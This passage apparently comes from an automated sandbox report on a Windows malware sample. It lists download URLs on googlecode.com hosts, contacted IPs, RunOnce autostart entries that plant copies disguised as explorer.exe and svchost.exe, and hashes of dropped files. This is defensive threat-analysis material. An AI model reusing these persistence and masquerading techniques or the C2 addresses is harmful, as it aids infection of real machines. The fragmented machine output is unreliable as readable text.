                      74.125.206.82
                      truefalse
                        unknown
                        codecmd01.googlecode.com
                        unknown
                        unknownfalse
                          unknown
                          codecmd03.googlecode.com
                          unknown
                          unknownfalse
                            unknown
                            codecmd02.googlecode.com
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://codecmd01.googlecode.com/files/tjcm.giffalse
                                unknown
                                http://codecmd02.googlecode.com/files/tjcm.giffalse
                                  unknown
                                  http://codecmd03.googlecode.com/files/tjcm.giffalse
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://codecmd01.googlecode.com/files/tjcm.gifktopshellwindow?.explorer.exe, 00000002.00000003.2788018051.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://codecmd02.googlecode.com/files/tjcm.giftvjajknxrvyslhtdncvjzkdgpbnfaqprchdxexsjqexplorer.exe, 00000002.00000003.2674296786.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://codecmd02.googlecode.com/filesxeAvzxqUTVjajkNxRvyslHTDnCvJZkDGpBNFAQPRchDXExsjQexplorer.exe, 00000002.00000003.2437368779.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://codecmd02.googlecode.com/files/tjcm.gifntimeBroker.exeexplorer.exe, 00000002.00000003.2624369245.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://codecmd03.googlecode.com/files/tjcm.gif%explorer.exe, 00000002.00000003.2789160714.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://codecmd03.googlecode.com/files/tjcm.gif&explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://codecmd02.googlecode.com/files/tjcm.gifmesexplorer.exe, 00000002.00000003.2899779963.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2606273000.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://codecmd03.googlecode.com/files/tjcm.gifgexplorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://codecmd02.googlecode.com/files/tjcm.gifpplication.1ed9explorer.exe, 00000002.00000003.2788018051.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://codecmd01.googlecode.com/files/tjcm.gifmesexplorer.exe, 00000002.00000003.2476922152.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://codecmd02.googlecode.com/files/tjcm.gifLexplorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://codecmd02.googlecode.com/files/tjcm.gif4-avx2.exe.exeexplorer.exe, 00000002.00000003.2674296786.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://codecmd03.googlecode.com/files/tjcm.gif0explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://codecmd03.googlecode.com/files/tjcm.gifmesexplorer.exe, 00000002.00000003.2788018051.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://codecmd01.googlecode.com/filesxeAvzxqUTVjajkNxRvyslHTDnCvJZkDGpBNFAQPRchDXExsjQexplorer.exe, 00000002.00000003.2538151708.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://codecmd01.googlecode.com/files/tjcm.gifntimeBroker.exe2.explorer.exe, 00000002.00000003.2804919705.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://codecmd03.googlecode.com/files/tjcm.gifxexplorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://codecmd01.googlecode.com/files/tjcm.gifLexplorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://codecmd03.googlecode.com/files/tjcm.gifntimeBroker.exeexplorer.exe, 00000002.00000003.2899779963.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.0000000000A15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://codecmd01.googlecode.com/files/tjcm.gif4-avx2.exendowexplorer.exe, 00000002.00000003.2411009435.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://codecmd02.googlecode.com/files/tjcm.gifpplication.1ed9f.uexplorer.exe, 00000002.00000003.2225864160.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://codecmd03.googlecode.com/files/tjcm.gif;explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://codecmd02.googlecode.com/files/tjcm.gifVexplorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2226018783.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://codecmd03.googlecode.com/files/tjcm.gifAexplorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://codecmd02.googlecode.com/files/tjcm.gifSexplorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://codecmd02.googlecode.com/files/tjcm.gifqexplorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2226018783.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://codecmd03.googlecode.com/files/tjcm.gifEexplorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://codecmd01.googlecode.com/files/tjcm.giftvjajknxrvyslhtdncvjzkdgpbnfaqprchdxexsjqexplorer.exe, 00000002.00000003.2538151708.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2476922152.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://codecmd03.googlecode.com/files/tjcm.gifLexplorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.enigmaprotector.com/file.exe, 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmp, spoolsv.exe, 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000005.00000002.2174500522.0000000000539000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000A.00000002.2310054237.0000000000539000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 0000000D.00000002.2383521769.0000000000539000.00000040.00000001.01000000.00000009.sdmpfalse
                                                                                                unknown
                                                                                                http://codecmd02.googlecode.com/files/tjcm.gifgexplorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://codecmd03.googlecode.com/files/tjcm.gifktopshellwindowexplorer.exe, 00000002.00000003.2393742757.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2325265565.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2344113748.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://codecmd01.googlecode.com/files/tjcm.gif1kexplorer.exe, 00000002.00000003.2344113748.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      108.177.15.82
                                                                                                      unknownUnited States
                                                                                                      15169GOOGLEUSfalse
                                                                                                      74.125.206.82
                                                                                                      googlecode.l.googleusercontent.comUnited States
                                                                                                      15169GOOGLEUSfalse
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1522734
                                                                                                      Start date and time:2024-09-30 16:12:16 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 10m 51s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:14
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:1
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:file.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.spre.evad.winEXE@17/10@3/2
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 50%
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target explorer.exe, PID 320 because there are no executed function
                                                                                                      • Execution Graph export aborted for target svchost.exe, PID 1600 because there are no executed function
                                                                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                      • VT rate limit hit for: file.exe
                                                                                                      TimeTypeDescription
                                                                                                      10:13:18API Interceptor795338x Sleep call for process: svchost.exe modified
                                                                                                      10:13:18API Interceptor832444x Sleep call for process: explorer.exe modified
                                                                                                      16:13:19AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\resources\themes\explorer.exe RO
                                                                                                      16:13:28AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\resources\svchost.exe RO
                                                                                                      No context
                                                                                                      No context
                                                                                                      No context
                                                                                                      No context
                                                                                                      No context
                                                                                                      Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16384
                                                                                                      Entropy (8bit):0.4022769148265937
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
                                                                                                      MD5:1E6AF6327736E3508F1C50506326C220
                                                                                                      SHA1:6115ED14E9AAF178029EA70716D76FECB1469C6C
                                                                                                      SHA-256:A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
                                                                                                      SHA-512:88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\Resources\spoolsv.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5632
                                                                                                      Entropy (8bit):1.0150719828554693
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQX7t9Xblt59Xh9XR5+1lf35X:rl3b/VFQLbltD7Ovf5
                                                                                                      MD5:F0BB1837B811267109CF4841D318E29A
                                                                                                      SHA1:D3C0858E30B74B2C8AA9D4DC25F3F264B34AA264
                                                                                                      SHA-256:6214A2910D47C08B5C1F2C0E935538E07F8D30655DE674B36150E55F11A89BCE
                                                                                                      SHA-512:6977A70C11535FE0F2CDCF96607076262B2B43DC37761C6C9A17414369666E46494E6C946E760E6B4DEB4B4FC2F88FEF6259C334744EF465133905F14030FB12
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\Resources\spoolsv.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5632
                                                                                                      Entropy (8bit):1.0150719828554693
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQX4it9Xblt59Xh9XR5+1lf35X:rl3b/VFQbbltD7Ovf5
                                                                                                      MD5:9385F683520F617615464D560E917955
                                                                                                      SHA1:5F32B81C40EA0264B73A6CE8CA892057E13532D1
                                                                                                      SHA-256:406D6DCBBC48489F2F177DB2AA99E6D4FD8D757A3E49B81C583EB93DB7AF0CBF
                                                                                                      SHA-512:A01B6F87A24AEE0B5E4E6A4E569EB56492DC9665B1F0CA0EA494341ACFB64759B377DCC75F17AE54D6B2293D27B7321D59A51E03E7C732FB40F4309CA2C2259E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\Resources\svchost.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16384
                                                                                                      Entropy (8bit):0.4022769148265937
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
                                                                                                      MD5:1E6AF6327736E3508F1C50506326C220
                                                                                                      SHA1:6115ED14E9AAF178029EA70716D76FECB1469C6C
                                                                                                      SHA-256:A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
                                                                                                      SHA-512:88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5632
                                                                                                      Entropy (8bit):1.013049389676441
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQXOt9Xblt59Xh9XR5+1lf35X:rl3b/VFQubltD7Ovf5
                                                                                                      MD5:1D2795B3107BA70F8DAE8AE34F2522C9
                                                                                                      SHA1:83BEA16D3A4329B809348254AB052A71EB759F98
                                                                                                      SHA-256:974D5C407321B46EA3B4BEFEB844A5ECBCAAAD0DF6050E2695E6A20A85CBD715
                                                                                                      SHA-512:B5D9301981D20B5AF6E3A715892F82983D0E339C3F46915D2325B533F65947E6B6F8C91BD2CCA174D1316A4C2E29870DBF0D7A56D76788E66B4D86BD4B76A97A
                                                                                                      Malicious:false
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\Resources\svchost.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5632
                                                                                                      Entropy (8bit):1.015427096491833
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQXWNt9Xblt59Xh9XR5+1lf35X:rl3b/VFQ8bltD7Ovf5
                                                                                                      MD5:2B0C09A8F06AA4B0005D7FC45C0F6487
                                                                                                      SHA1:15F8C10EB1F235F4F81A6835AEF65F5BA9A3631B
                                                                                                      SHA-256:19CE2E17B65D7F353EFAA507CCB1B2F82031F7B0FB2BBB311062EAD5003B1105
                                                                                                      SHA-512:FC703C693531FB50D8376D5DE0301EF2EB35B0B6082C2929258036B20EABEAC057C6B353EF0DAB149903AA16E75585EDD93B4D772E2C1792F6C9C3474304B908
                                                                                                      Malicious:false
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5632
                                                                                                      Entropy (8bit):1.015427096491833
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQX+vXt9Xblt59Xh9XR5+1lf35X:rl3b/VFQ+nbltD7Ovf5
                                                                                                      MD5:1FD505D51BB27988FCDAD8414DFC6A04
                                                                                                      SHA1:797F9D509ED4483CCF8BDDBA3E42984F9542D3AE
                                                                                                      SHA-256:AA2DBF10541B3205750132369147B0EAE79F3705B9F88E4B5AD7524C0F1B1D4C
                                                                                                      SHA-512:F3D95D6D10B9F7BE8964AB578634FB7CC6EE7B0EAFA6FA81E75569B455883A98C57AC230C521832D24569BD555FDCA3A48943EC51BB7A599AF39178A54A38A06
                                                                                                      Malicious:false
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                      File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                      Category:dropped
                                                                                                      Size (bytes):759811
                                                                                                      Entropy (8bit):7.918192788099419
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:ltTuh645I8jWtJ8OgL27rd69bk5NCgGhSFB79gYhLIf6EQ9EYcw1FK:lIg4kt0Kd6F6CNzYhUiEWEYcwy
                                                                                                      MD5:8C38488BD8A8FFF2A635B644BEB61C1E
                                                                                                      SHA1:A6B82CE136CDF5BC1C594E84E779980681164E28
                                                                                                      SHA-256:165360F0B1BD42E28C480A956F5323D9C8E1516E59E781CFC102161FD7CD06F8
                                                                                                      SHA-512:C7C62A8842076A0AE2CD3CEEFB162D7DFA473D64D9AFB90E9EBFB73F10BB879A6F66E8A2320A90BC4C85CC4BC206E02615ADE99AF9444443AE92D0C481033B39
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0....................@.......................... 7......E........................................-.D.......................................................................................................................................................@............ ..........................@............ ........................5.@....rsrc.... ....... ..................@.............+.........................@....data.........-.....................@...........................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                      File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                      Category:dropped
                                                                                                      Size (bytes):759642
                                                                                                      Entropy (8bit):7.916571263625136
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:ltTuh645I8jWtJ8OgL27rd69bk5NCgGhSFB79gYhLIf6EQ9EYcw1F9:lIg4kt0Kd6F6CNzYhUiEWEYcwV
                                                                                                      MD5:6375F300DFDCF48B2502987709E35C1C
                                                                                                      SHA1:093F41F243876E3F83FF7A3F17A9A87103467825
                                                                                                      SHA-256:EF4854D269C56991271DF496B645BB3AB77225EEF3D7F1AB923E6311667A135D
                                                                                                      SHA-512:C4038FF5C8C9E2431EEC43AD0CA03F7DFFEB4C298682D8916A450736250787A226985E2532FF78305D8378B969BE018007D6BFFBAA8A7F197777E9AA432F6164
                                                                                                      Malicious:true
                                                                                                      Antivirus:
